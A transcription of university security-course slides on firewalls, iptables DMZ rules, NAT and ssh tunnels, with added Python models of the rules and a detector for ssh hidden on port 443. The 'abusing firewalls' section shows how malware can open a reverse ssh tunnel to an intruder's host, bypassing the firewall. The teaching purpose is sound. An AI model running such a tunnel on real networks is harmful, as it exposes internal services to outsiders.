Focus on Security. Keeping the bad guys out

ICT Security: Topics
- Day 1: General principles.
- Day 2: System hardening and integrity.
- Day 3: Keeping the bad guys out.
- Day 4: Seeing the invisible; what's passing through the wires?
- Day 5: Summary and conclusions.
Notes: Security is complex and extensive. Only the highlights will be covered during this course. Aims: increase awareness, show examples, present a framework.

ICT Security: Today's topics
- Firewalls: principles and implementation
- Network Address Translation (NAT)
- Abusing firewalls

Apply a Firewall
Firewalls:
- Are not a cure for all your problems.
- Are primarily useful to prevent attacks from the outside world aimed at our computers.
- But... web browsing, ...?

Apply a Firewall
Firewalls:
- Every opening is a hole in the wall: viruses/worms may leave through the hole.
- Malignant software may use encryption, and may thus be indistinguishable from `legal' traffic using encryption.
- Firewalls need maintenance. Who's doing that? Who has the knowledge to do so?
- Firewalls are bypassed when the user downloads the malware.

Firewalls: Setup
Terminology:
- Bastion hosts
- DMZ
- Firewall
- Internal network
- Multi-homed host
- (Stateful) packet filtering

Firewalls: Setup
Basic (common) setup: [diagram only]

Firewalls: Setup
DMZ (preferred) setup:
[Diagram: Router -> Firewall -> DMZ with external servers (DNS, mail, web); Firewall -> switch -> internal net with workstations and internal servers (DNS, file, mail)]

Firewalls: Setup
DMZ communication rules cover three relations:
- Internet to/from DMZ
- Internet to/from internal net
- DMZ to/from internal net

Firewalls: Setup
DMZ communication rules, Internet to/from DMZ:
- Incoming only to known services
- Outbound only as part of established connections
- No new connections originate from the DMZ
- Simple plain spoofing protection
- No forwarding

Firewalls: Setup
DMZ communication rules, Internet to/from internal net:
- No new inbound connections
- No new outbound connections if proxying is at all possible; otherwise be extremely cautious
- No forwarding
- Simple plain spoofing protection

Firewalls: Setup
DMZ communication rules, DMZ to/from internal net:
- No new connections from the DMZ to workstations
- New connections only to/from matching services
- Simple spoofing protection rules
- No forwarding

Firewalls: Implementation
Iptables is used to implement the firewall:
- Widely available
- Free software
- No special hardware required
- Can be used on a per-host or organization level

Firewalls: Implementation
Iptables installation and activation:
- Installation: apt-get install iptables
- Documentation:
- Activation: ./iptables /path/to/rules-file
- The rules file is a simple text file
- This scheme is usually fine-tuned
Notes: iptables-save and iptables-restore are usually called from /etc/init.d/iptables at startup to reinstall the firewall as soon as the computer boots. iptables-save writes the contents of the iptables to standard output (cout). Incantation: iptables-save > /var/lib/iptables/active (restore in, e.g., /etc/network/if-pre-up.d).

Firewalls: concepts
What is input, output and forwarding?
[Diagram: incoming traffic -> routing decision -> FORWARDING -> outgoing traffic; routing decision -> INPUT -> local processes -> OUTPUT -> outgoing traffic]
- Routing decision: INPUT or FORWARDING? What's the intended destination? Incoming traffic is immediately separated into traffic intended for this computer and traffic that is not.
- INPUT: traffic entering the computer that is intended for the computer itself is verified at INPUT.
- OUTPUT: traffic handled by local processes leaves the computer if verified by OUTPUT.
- FORWARDING (the FORWARD chain): traffic not intended for local processes passes through if verified by FORWARD.

Firewalls: Rules
A simple (and not so desirable) initial file:
    -P OUTPUT ACCEPT     # accept all output connections
    -F OUTPUT
    -P INPUT ACCEPT      # accept all input connections
    -F INPUT
    -P FORWARD ACCEPT    # accept all forwarding connections
    -F FORWARD
No filtering of any kind. Could be useful, though...
Notes: ... as a fallback, to make visible what you're doing if you're not using a firewall.

Firewalls: Rules
Handling IPv6:
    /sbin/ip6tables --flush
    /sbin/ip6tables --delete-chain
    /sbin/ip6tables -P OUTPUT DROP     # drop output connections
    /sbin/ip6tables -P INPUT DROP      # drop input connections
    /sbin/ip6tables -P FORWARD DROP    # drop forwarding connections

Firewalls: Setup
DMZ setup:
[Diagram: Router -> Firewall -> DMZ servers (smtp, http, https); Firewall -> switch -> internal net workstations]

Firewalls: implementing the DMZ
Recap: DMZ communication rules, Internet to/from DMZ:
- Incoming only to known services (e.g., smtp, http, https)
- Outbound only as part of established connections
- No new connections originate from the DMZ
- Simple plain spoofing protection
- No forwarding

Firewalls: implementing the DMZ
Internet to/from DMZ, incoming only to known services (e.g., smtp, http, https):
    -P INPUT DROP
    -F INPUT
    -A INPUT -p tcp --dport smtp -j ACCEPT
    -A INPUT -p tcp --dport http -j ACCEPT
    -A INPUT -p tcp --dport https -j ACCEPT
    -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
(The slides write the policy as DENY; iptables has no DENY target, the chain policy that silently discards packets is DROP.)

Firewalls: implementing the DMZ
Outbound only as part of established connections:
    -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

Firewalls: implementing the DMZ
No new connections originate from the DMZ; start the output rules with:
    -P OUTPUT DROP
    -F OUTPUT

Firewalls: implementing the DMZ
Simple plain spoofing protection (the -s match only lets packets out that carry the host's own address as source):
    -A OUTPUT -s ${DNS_name} \
        -m state --state RELATED,ESTABLISHED -j ACCEPT

Firewalls: implementing the DMZ
No forwarding:
    -P FORWARD DROP
    -F FORWARD

Firewalls: implementing the DMZ
Internet to/from DMZ: the complete setup
    -P INPUT DROP
    -F INPUT
    -A INPUT -p tcp --dport smtp -j ACCEPT
    -A INPUT -p tcp --dport http -j ACCEPT
    -A INPUT -p tcp --dport https -j ACCEPT
    -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
    -P OUTPUT DROP
    -F OUTPUT
    -A OUTPUT -s ${DNS_name} \
        -m state --state RELATED,ESTABLISHED -j ACCEPT
    -P FORWARD DROP
    -F FORWARD
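To see what the complete Internet-to-DMZ setup actually admits and refuses, here is a small model of the ruleset with a conntrack-style state match, written as an added example (not the slides' code); the addresses DMZ_HOST and CLIENT are constructed, and DENY is modelled as the iptables policy DROP.

```python
"""Toy model of the Internet-to-DMZ ruleset above (added example, not the slides' code).

Modelled: a default policy per chain (-P), ordered rules (-A) matching protocol, port and
source, and the conntrack state match that lets replies out while blocking connections the
DMZ host itself would open.  Only the NEW and ESTABLISHED states occur; RELATED is not modelled.
"""
from collections import namedtuple
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

SERVICES = {"smtp": 25, "http": 80, "https": 443}   # /etc/services names used on the slides
DMZ_HOST = "198.51.100.10"   # constructed: the DMZ host's own address, the slides' ${DNS_name}
CLIENT = "203.0.113.5"       # constructed: a client somewhere on the Internet
ESTABLISHED = {"RELATED", "ESTABLISHED"}

Packet = namedtuple("Packet", "src dst proto sport dport")


@dataclass
class Rule:
    """One -A line: every match that is set must hold for the rule to fire."""
    target: str                        # -j ACCEPT / DROP
    proto: Optional[str] = None        # -p tcp
    dport: Optional[int] = None        # --dport
    src: Optional[str] = None          # -s
    states: Optional[Set[str]] = None  # -m state --state ...

    def matches(self, pkt: Packet, state: str) -> bool:
        return ((self.proto is None or pkt.proto == self.proto)
                and (self.dport is None or pkt.dport == self.dport)
                and (self.src is None or pkt.src == self.src)
                and (self.states is None or state in self.states))


class Firewall:
    def __init__(self) -> None:
        self.policy: Dict[str, str] = {}        # chain -> default target
        self.rules: Dict[str, List[Rule]] = {}  # chain -> ordered rules
        self.conntrack: Set[Tuple[str, int, str, int]] = set()  # accepted connections, initiator's view

    def set_policy(self, chain: str, target: str) -> None:   # -P chain target ; -F chain
        self.policy[chain] = target
        self.rules[chain] = []

    def append(self, chain: str, rule: Rule) -> None:         # -A chain ...
        self.rules[chain].append(rule)

    def _state(self, pkt: Packet) -> str:
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return "ESTABLISHED" if fwd in self.conntrack or rev in self.conntrack else "NEW"

    def filter(self, chain: str, pkt: Packet) -> str:
        """Walk the chain top-down: the first matching rule decides, otherwise the policy."""
        state = self._state(pkt)
        verdict = next((r.target for r in self.rules[chain] if r.matches(pkt, state)),
                       self.policy[chain])
        if verdict == "ACCEPT" and state == "NEW":   # conntrack learns every accepted new connection
            self.conntrack.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
        return verdict


def dmz_firewall(own_addr: str = DMZ_HOST) -> Firewall:
    """The slides' complete setup, with the DENY they write given as the iptables policy DROP."""
    fw = Firewall()
    fw.set_policy("INPUT", "DROP")
    for name in ("smtp", "http", "https"):   # -A INPUT -p tcp --dport <service> -j ACCEPT
        fw.append("INPUT", Rule("ACCEPT", proto="tcp", dport=SERVICES[name]))
    fw.append("INPUT", Rule("ACCEPT", states=ESTABLISHED))
    fw.set_policy("OUTPUT", "DROP")
    # -A OUTPUT -s ${DNS_name} -m state --state RELATED,ESTABLISHED -j ACCEPT
    fw.append("OUTPUT", Rule("ACCEPT", src=own_addr, states=ESTABLISHED))
    fw.set_policy("FORWARD", "DROP")
    return fw


def demo() -> Dict[str, str]:
    """Verdicts for the traffic classes the DMZ communication rules describe."""
    fw = dmz_firewall()
    return {
        "inbound_https": fw.filter("INPUT", Packet(CLIENT, DMZ_HOST, "tcp", 40000, 443)),  # known service
        "https_reply": fw.filter("OUTPUT", Packet(DMZ_HOST, CLIENT, "tcp", 443, 40000)),   # established
        "inbound_ssh": fw.filter("INPUT", Packet(CLIENT, DMZ_HOST, "tcp", 40001, 22)),     # unknown service
        "dmz_initiates": fw.filter("OUTPUT", Packet(DMZ_HOST, CLIENT, "tcp", 50000, 80)),  # NEW from the DMZ
        "spoofed_reply": fw.filter("OUTPUT", Packet("10.0.0.9", CLIENT, "tcp", 443, 40000)),  # foreign source
        "forward": fw.filter("FORWARD", Packet(CLIENT, "10.0.0.9", "tcp", 1, 80)),        # nothing routed
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:14} {verdict}")
```

The reply is only accepted because the client's connection was accepted first; run on its own, the same OUTPUT packet is NEW and is dropped.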

Firewalls: implementing the DMZ
If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf:
    net.ipv4.conf.default.rp_filter=1          # spoofing protection
    net.ipv4.conf.all.rp_filter=1              # spoofing protection
    net.ipv4.ip_forward=1                      # forward IPv4 packets
    net.ipv4.icmp_echo_ignore_broadcasts = 1   # what it says

Network Address Translation
Concepts: Source NAT
- The source address (i.e., where the packet is coming from) is modified.
- Just before the packet leaves the box: POSTROUTING.
- Example: masquerading
[Diagram: incoming traffic -> routing decision -> FORWARDING -> NAT: POSTROUTING -> outgoing traffic; INPUT -> local processes -> OUTPUT -> NAT: POSTROUTING]

Network Address Translation
Concepts: Destination NAT
- The destination address (i.e., where the packet is going to) is modified.
- Just before the routing decision is made: PREROUTING.
- Example: port forwarding, proxying
[Diagram: incoming traffic -> NAT: PREROUTING -> routing decision -> FORWARDING / INPUT -> local processes -> OUTPUT -> NAT: POSTROUTING -> outgoing traffic]

Network Address Translation
Source NAT: changing the address the packet is coming from (POSTROUTING). With POSTROUTING the packet leaves the router.
Application: computers behind a router using a private range; all information coming from these computers should appear to be coming from the router.

Network Address Translation
Source NAT (POSTROUTING) application: computers behind a router in a private range; information from these computers appears to come from the router.
[Diagram: x.y range -- x.y interface (eth1) -- router -- Internet interface (eth0) -- Internet. Source NAT: x.y appears to be the router]
    -t nat -A POSTROUTING -s x.y/24 -o eth0 -j SNAT \
        --to-source $routerip

Network Address Translation
Destination NAT: changing the address the packet is going to (PREROUTING). With PREROUTING the packet enters the router.
Application: computers behind a router in a private range (x.y); information sent to the router is relayed to one of the computers in the private range.
[Diagram: trusted MTA -- Internet -- Internet interface -- router -- x.y interface -- x.y range, host x.25. Destination NAT: x.25 receives the mail]
    -t nat -A PREROUTING -p tcp -s $MTA_IP -d $routerip \
        --dport 25 -j DNAT --to-destination x.25

Source NAT Logging
NATLOG logs the network translations. Actions performed by source NAT translations:
- IPsrc:sport is translated by the firewall to IPfw:fwport;
- IPfw:fwport is used when communicating with IPdst:dport.
[Diagram: x.y range (IPsrc:sport) -- x.y interface (eth1) -- router -- Internet iface (eth0), IPfw:fwport -- Internet. Source NAT: x.y appears to be the origin]
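The two nat rules above and the translation record NATLOG reports, worked through in a small model of the router: an added example, not the slides' or NATLOG's code. ROUTER_IP ($routerip on eth0), PRIVATE_NET (the slides' x.y range on eth1), MAIL_HOST (x.25) and MTA_IP ($MTA_IP) are constructed addresses.

```python
"""SNAT (POSTROUTING) and DNAT (PREROUTING) as the slides describe them, plus the
translation record NATLOG reports.  Added example, not the slides' or NATLOG's code.

Addresses are constructed: the router's Internet side is ROUTER_IP ($routerip on eth0),
the private range behind eth1 is PRIVATE_NET (the slides' x.y), and MTA_IP is the trusted
MTA whose mail the DNAT rule relays to host x.25.
"""
from dataclasses import dataclass, replace
from typing import Dict, List, Tuple

ROUTER_IP = "192.0.2.1"
PRIVATE_NET = "10.1.2."
MAIL_HOST = PRIVATE_NET + "25"
MTA_IP = "198.51.100.25"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"


class NatRouter:
    def __init__(self, first_port: int = 1024) -> None:
        self.next_port = first_port
        self.snat: Dict[Tuple[str, int, str, int], int] = {}             # (src,sport,dst,dport) -> fwport
        self.snat_rev: Dict[Tuple[int, str, int], Tuple[str, int]] = {}  # (fwport,dst,dport) -> (src,sport)
        self.dnat_rev: Dict[Tuple[str, int, str, int], str] = {}         # reply 4-tuple -> address to restore
        self.natlog: List[str] = []

    def prerouting(self, pkt: Packet) -> Packet:
        """nat PREROUTING runs before the routing decision, so it may change the destination."""
        # -t nat -A PREROUTING -p tcp -s $MTA_IP -d $routerip --dport 25 -j DNAT --to-destination x.25
        if pkt.proto == "tcp" and pkt.src == MTA_IP and pkt.dst == ROUTER_IP and pkt.dport == 25:
            # remember how the reply (x.25:25 -> MTA) must be rewritten back to the router's address
            self.dnat_rev[(MAIL_HOST, 25, pkt.src, pkt.sport)] = ROUTER_IP
            return replace(pkt, dst=MAIL_HOST)
        # replies to SNATed connections: conntrack undoes the source translation
        key = (pkt.dport, pkt.src, pkt.sport)
        if pkt.dst == ROUTER_IP and key in self.snat_rev:
            src, sport = self.snat_rev[key]
            return replace(pkt, dst=src, dport=sport)
        return pkt

    def postrouting(self, pkt: Packet) -> Packet:
        """nat POSTROUTING runs as the packet leaves, so it may change the source."""
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        if key in self.dnat_rev:   # reply of a DNATed connection: restore the router's address
            return replace(pkt, src=self.dnat_rev[key])
        # -t nat -A POSTROUTING -s x.y/24 -o eth0 -j SNAT --to-source $routerip
        if not pkt.src.startswith(PRIVATE_NET):
            return pkt
        if key not in self.snat:   # first packet of a connection: allocate a router port
            fwport, self.next_port = self.next_port, self.next_port + 1
            self.snat[key] = fwport
            self.snat_rev[(fwport, pkt.dst, pkt.dport)] = (pkt.src, pkt.sport)
            # the record NATLOG keeps: IPsrc:sport (via: IPfw:fwport) to IPdst:dport
            self.natlog.append(f"NATLOG: {pkt.src}:{pkt.sport} (via: {ROUTER_IP}:{fwport}) "
                               f"to {pkt.dst}:{pkt.dport}")
        return replace(pkt, src=ROUTER_IP, sport=self.snat[key])

    def forward(self, pkt: Packet) -> Packet:
        """A forwarded packet traverses PREROUTING, the routing decision, then POSTROUTING."""
        return self.postrouting(self.prerouting(pkt))


def demo() -> dict:
    router = NatRouter()
    web = "203.0.113.80"                                                # constructed web server
    out = router.forward(Packet(PRIVATE_NET + "7", 55359, web, 80))     # x.7 browses
    back = router.forward(Packet(web, 80, ROUTER_IP, out.sport))        # the server answers the router
    mail_in = router.forward(Packet(MTA_IP, 48963, ROUTER_IP, 25))      # the MTA delivers to the router
    mail_back = router.forward(Packet(MAIL_HOST, 25, MTA_IP, 48963))    # x.25 answers the MTA
    return {"out": out, "back": back, "mail_in": mail_in, "mail_back": mail_back,
            "natlog": router.natlog}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:10} {value}")
```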

Source NAT Logging
NATLOG logs the network translations:
- Standard log facilities offer complex data
- NATLOG beautifies the logs, using
  - pcap library facilities looking at the interfaces, or
  - information made available by conntrackd

Source NAT Logging
Two activation commands:
    natlog indevice outdevice    (e.g., natlog eth1 eth0)
    natlog conntrack             (requires conntrack installed)
Syslog logs may be sent to a dedicated natlog.log (rsyslog filters):
    :syslogtag, isequal, "NATLOG:"  /var/log/natlog.log
    :syslogtag, isequal, "NATLOG:"  ~

Source NAT Logging
Examples of some log entries (the IP addresses are missing from the transcription):
    Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28: (UTC): :55359 (via: :55359) to :113
    Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12: until Jan 6 12:12:08: (UTC): :3166 (via: :3166) to :80

Firewalls and tunnels
The concept: enter at one end, reappear at the other end.

Firewalls and tunnels
Tunnels, the concept as used in Information Technology:
- Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol
- Often: ssh is used
- In real life firewalls allow at least some outgoing connections (http, https, smtp)

Firewalls and tunnels
Often ssh is used to:
- Connect to a remote computer's service, using a secure tunnel
- Allow a remote computer's local connections to access a remote computer's service
What this boils down to...

Firewalls and tunnels
The situation:
- Workstation (W) and Server (S, offering a sensitive service at port 143) on a trusted local area network, behind a firewall
- The firewall accepts only traffic on ports 80 and 443
- Intruder (I), located outside the firewall
[Diagram: W and S (143) behind the firewall, which transfers ports 80 and 443; I outside]

Firewalls and tunnels
The Intruder: at the intruder an ssh daemon runs watching port 443 (e.g., sshd -p 443).

Firewalls and tunnels
Malware: at the workstation the shown ssh command is executed, using a virus, social engineering, a disgruntled employee?...
    ssh -p 443 -R 1443:server:143 intruder

Firewalls and tunnels
Setting up the tunnel: ssh connects through the firewall to port 443 at intruder.

Firewalls and tunnels
(Ab)using the tunnel: a client at intruder connects using intruder's local port 1443.

Firewalls and tunnels
A secure tunnel is now established through the workstation, allowing the accessor to use the server's service 143 directly. The firewall offers no protection.
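The tunnel above gets through because the firewall judges by port number alone; an ssh session on port 443 still announces itself in clear text with the RFC 4253 identification string "SSH-..." instead of a TLS handshake. The following check over the first payload bytes of outbound connections is an added example (not the slides' code); the flow records and addresses are constructed.

```python
"""Spotting an ssh session on a port the firewall opens for https (added example,
not the slides' code).

The reverse tunnel above works because the firewall judges by port number only.
A defender who keeps the first payload bytes of each outbound connection can check
that what leaves on 443 actually starts a TLS handshake: an SSH connection announces
itself in clear text with the identification string "SSH-<version>-<software>"
(RFC 4253), whatever port it uses.  The flow records below are constructed.
"""
from typing import Dict, List, Tuple

# Ports the slides' firewall lets through, and the protocol each is meant to carry.
EXPECTED = {80: "http", 443: "tls"}

Flow = Tuple[str, str, int, bytes]   # (source, destination, destination port, first payload bytes)


def classify(payload: bytes) -> str:
    """Name the protocol from the first bytes one side of a connection sends."""
    if payload.startswith(b"SSH-"):   # RFC 4253 identification string, sent by both sides
        return "ssh"
    # TLS record header: content type 22 (handshake), version major 3, then a ClientHello (type 1)
    if len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03 and payload[5] == 0x01:
        return "tls"
    if payload.startswith((b"GET ", b"POST ", b"HEAD ", b"PUT ", b"CONNECT ", b"OPTIONS ")):
        return "http"
    return "unknown"


def suspicious_flows(flows: List[Flow]) -> List[str]:
    """Report outbound flows whose payload does not match the protocol the port is meant for."""
    alerts = []
    for src, dst, dport, payload in flows:
        seen = classify(payload)
        expected = EXPECTED.get(dport)
        if expected is not None and seen != expected:
            alerts.append(f"{src} -> {dst}:{dport} carries {seen}, expected {expected}")
    return alerts


# Constructed sample: first client bytes of four connections leaving a workstation (W).
SAMPLE_FLOWS: List[Flow] = [
    ("10.1.2.7", "203.0.113.80", 443, bytes.fromhex("16030100c5010000c10303") + b"\x00" * 32),
    ("10.1.2.7", "203.0.113.80", 80, b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
    ("10.1.2.7", "198.51.100.99", 443, b"SSH-2.0-OpenSSH_8.9p1\r\n"),   # the slides' ssh -p 443
    ("10.1.2.7", "198.51.100.99", 80, b"\x00\x00\x00\x10\x7f"),          # something else on 80
]


def demo() -> Dict[str, object]:
    return {"classes": [classify(payload) for *_, payload in SAMPLE_FLOWS],
            "alerts": suspicious_flows(SAMPLE_FLOWS)}


if __name__ == "__main__":
    for alert in demo()["alerts"]:
        print(alert)
```

This only catches ssh that is not itself wrapped in TLS; traffic that really is encrypted looks like any other https session, which is the slides' point about encrypted malware traffic, and the stronger answer is the proxying the communication rules ask for.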

Firewalls and tunnels
Why tunneling?
- Tunnels secure inherently insecure protocols (pop, daytime, ...)
- As a side effect: the hacker can use the tools too...
- Less serious applications: X11 tunneling (see the SSH documentation)
- Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

Firewalls and tunnels
Tunnels: allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example:
    ssh -L 1313:remotehost:13 remotehost
forwards connections from port 1313 at the local host to port 13 at remotehost (written ssh -L 1313:localhost:13 remotehost on the build-up slide; the host name is resolved at the remote end).

Firewalls and tunnels
2nd example:
    ssh -L 1313:alternatehost:13 remotehost
connects to port 13 at alternatehost, succeeding if remotehost allows us to connect to alternatehost's port 13. The connection between localhost and remotehost is secure; the connection between remotehost and alternatehost is not. Note: use -g to access port 1313 from any host.

Firewalls and tunnels
Ssh tunnels, a summary. Securing insecure protocols (1):
    ssh -L 1313:somehost:13 remotehost
Connections to localhost:1313 are forwarded using ssh to remotehost, and from there to somehost:13 (somehost may be remotehost). The -g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!).

Firewalls and tunnels
Securing insecure protocols (2):
    ssh remotehost -R 1234:somehost:80
Connections to remotehost:1234 are carried encrypted to the computer issuing the ssh command, and from there forwarded to somehost:80.

Focus on Security
Today's topics:
- Firewalls: principles and implementation
- Network Address Translation
- Abusing firewalls
Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts. They offer no protection against abuse caused by infections (possibly caused by users).

Focus on Security
Day 4: Seeing the invisible
- The bottom line: tcpdump
- The applications: Wireshark, OpenVAS

Focus on Security
Keeping the bad guys out (?)
dr. Frank B. Brokken, Center of Information Technology, University of Groningen, 2013


More information

CS 5410 - Computer and Network Security: Firewalls

CS 5410 - Computer and Network Security: Firewalls CS 5410 - Computer and Network Security: Firewalls Professor Kevin Butler Fall 2015 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire, heat

More information

Module II. Internet Security. Chapter 6. Firewall. Web Security: Theory & Applications. School of Software, Sun Yat-sen University

Module II. Internet Security. Chapter 6. Firewall. Web Security: Theory & Applications. School of Software, Sun Yat-sen University Module II. Internet Security Chapter 6 Firewall Web Security: Theory & Applications School of Software, Sun Yat-sen University Outline 6.1 Introduction to Firewall What Is a Firewall Types of Firewall

More information

CS 5410 - Computer and Network Security: Firewalls

CS 5410 - Computer and Network Security: Firewalls CS 5410 - Computer and Network Security: Firewalls Professor Patrick Traynor Spring 2015 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

CSC574 - Computer and Network Security Module: Firewalls

CSC574 - Computer and Network Security Module: Firewalls CSC574 - Computer and Network Security Module: Firewalls Prof. William Enck Spring 2013 1 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

Internet infrastructure. Prof. dr. ir. André Mariën

Internet infrastructure. Prof. dr. ir. André Mariën Internet infrastructure Prof. dr. ir. André Mariën (c) A. Mariën 31/01/2006 Topic Firewalls (c) A. Mariën 31/01/2006 Firewalls Only a short introduction See for instance: Building Internet Firewalls, second

More information

CSE543 - Computer and Network Security Module: Firewalls

CSE543 - Computer and Network Security Module: Firewalls CSE543 - Computer and Network Security Module: Firewalls Professor Trent Jaeger Fall 2010 1 Firewalls A firewall... is a physical barrier inside a building or vehicle, designed to limit the spread of fire,

More information

CSE331: Introduction to Networks and Security. Lecture 12 Fall 2006

CSE331: Introduction to Networks and Security. Lecture 12 Fall 2006 CSE331: Introduction to Networks and Security Lecture 12 Fall 2006 Announcements Midterm I will be held Friday, Oct. 6th. True/False Multiple Choice Calculation Short answer Short essay Project 2 is on

More information

Firewall implementation and testing

Firewall implementation and testing Firewall implementation and testing Patrik Ragnarsson, Niclas Gustafsson E-mail: ragpa737@student.liu.se, nicgu594@student.liu.se Supervisor: David Byers, davby@ida.liu.se Project Report for Information

More information

allow all such packets? While outgoing communications request information from a

allow all such packets? While outgoing communications request information from a FIREWALL RULES Firewalls operate by examining a data packet and performing a comparison with some predetermined logical rules. The logic is based on a set of guidelines programmed in by a firewall administrator,

More information

Firewalls. Chien-Chung Shen cshen@cis.udel.edu

Firewalls. Chien-Chung Shen cshen@cis.udel.edu Firewalls Chien-Chung Shen cshen@cis.udel.edu The Need for Firewalls Internet connectivity is essential however it creates a threat vs. host-based security services (e.g., intrusion detection), not cost-effective

More information

Proxy Server, Network Address Translator, Firewall

Proxy Server, Network Address Translator, Firewall For Summer Training on Computer Networking visit Proxy Server, Network Address Translator, Firewall Prepared by : Swapan Purkait Director Nettech Private Limited swapan@nettech.in + 91 93315 90003 Proxy

More information

Networking Basics and Network Security

Networking Basics and Network Security Why do we need networks? Networking Basics and Network Security Shared Data and Functions Availability Performance, Load Balancing What is needed for a network? ISO 7-Layer Model Physical Connection Wired:

More information

How to Secure RHEL 6.2 Part 2

How to Secure RHEL 6.2 Part 2 How to Secure RHEL 6.2 Part 2 Motivation This paper is part of a multi-part series on securing Redhat Enterprise Linux 6.2. This paper focuses on implementing IPtables as a host based firewall. If you

More information

8. Firewall Design & Implementation

8. Firewall Design & Implementation DMZ Networks The most common firewall environment implementation is known as a DMZ, or DeMilitarized Zone network. A DMZ network is created out of a network connecting two firewalls; i.e., when two or

More information

+ iptables. packet filtering && firewall

+ iptables. packet filtering && firewall + iptables packet filtering && firewall + what is iptables? iptables is the userspace command line program used to configure the linux packet filtering ruleset + a.k.a. firewall + iptable flow chart what?

More information

Network Defense Tools

Network Defense Tools Network Defense Tools Prepared by Vanjara Ravikant Thakkarbhai Engineering College, Godhra-Tuwa +91-94291-77234 www.cebirds.in, www.facebook.com/cebirds ravikantvanjara@gmail.com What is Firewall? A firewall

More information

Firewall Firewall August, 2003

Firewall Firewall August, 2003 Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also

More information

CMPT 471 Networking II

CMPT 471 Networking II CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access

More information

GregSowell.com. Mikrotik Security

GregSowell.com. Mikrotik Security Mikrotik Security IP -> Services Disable unused services Set Available From for appropriate hosts Secure protocols are preferred (Winbox/SSH) IP -> Neighbors Disable Discovery Interfaces where not necessary.

More information

Network security Exercise 9 How to build a wall of fire Linux Netfilter

Network security Exercise 9 How to build a wall of fire Linux Netfilter Network security Exercise 9 How to build a wall of fire Linux Netfilter Tobias Limmer Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany 14.

More information

Virtual private network. Network security protocols VPN VPN. Instead of a dedicated data link Packets securely sent over a shared network Internet VPN

Virtual private network. Network security protocols VPN VPN. Instead of a dedicated data link Packets securely sent over a shared network Internet VPN Virtual private network Network security protocols COMP347 2006 Len Hamey Instead of a dedicated data link Packets securely sent over a shared network Internet VPN Public internet Security protocol encrypts

More information

Netfilter. GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic. January 2008

Netfilter. GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic. January 2008 Netfilter GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic January 2008 Netfilter Features Address Translation S NAT, D NAT IP Accounting and Mangling IP Packet filtering

More information

Linux Firewall. Linux workshop #2. www.burningnode.com

Linux Firewall. Linux workshop #2. www.burningnode.com Linux Firewall Linux workshop #2 Summary Introduction to firewalls Introduction to the linux firewall Basic rules Advanced rules Scripting Redundancy Extensions Distributions Links 2 Introduction to firewalls

More information

Protecting and controlling Virtual LANs by Linux router-firewall

Protecting and controlling Virtual LANs by Linux router-firewall Protecting and controlling Virtual LANs by Linux router-firewall Tihomir Katić Mile Šikić Krešimir Šikić Faculty of Electrical Engineering and Computing University of Zagreb Unska 3, HR 10000 Zagreb, Croatia

More information

Network Security Exercise 10 How to build a wall of fire

Network Security Exercise 10 How to build a wall of fire Network Security Exercise 10 How to build a wall of fire Tobias Limmer, Christoph Sommer, David Eckhoff Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg,

More information

Cryptography and network security

Cryptography and network security Cryptography and network security Firewalls slide 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible

More information

Cisco Secure PIX Firewall with Two Routers Configuration Example

Cisco Secure PIX Firewall with Two Routers Configuration Example Cisco Secure PIX Firewall with Two Routers Configuration Example Document ID: 15244 Interactive: This document offers customized analysis of your Cisco device. Contents Introduction Prerequisites Requirements

More information

Linux Firewalls (Ubuntu IPTables) II

Linux Firewalls (Ubuntu IPTables) II Linux Firewalls (Ubuntu IPTables) II Here we will complete the previous firewall lab by making a bridge on the Ubuntu machine, to make the Ubuntu machine completely control the Internet connection on the

More information

CSE/ISE 311: Systems Administra5on Network Firewalls

CSE/ISE 311: Systems Administra5on Network Firewalls Network Firewalls Don Porter Firewalls: An Essen2al Tool Previous Lectures: Every service on a system visible to the outside world is a poten2al a>ack vector Observa2ons: It is really hard to police every

More information

CIS 433/533 - Computer and Network Security Firewalls

CIS 433/533 - Computer and Network Security Firewalls CIS 433/533 - Computer and Network Security Firewalls Professor Kevin Butler Winter 2011 Computer and Information Science Firewalls A firewall... is a physical barrier inside a building or vehicle, designed

More information

Architecture. Dual homed box 10.45.7.1 10.45.7.2. Internet 10.45.7.0/8

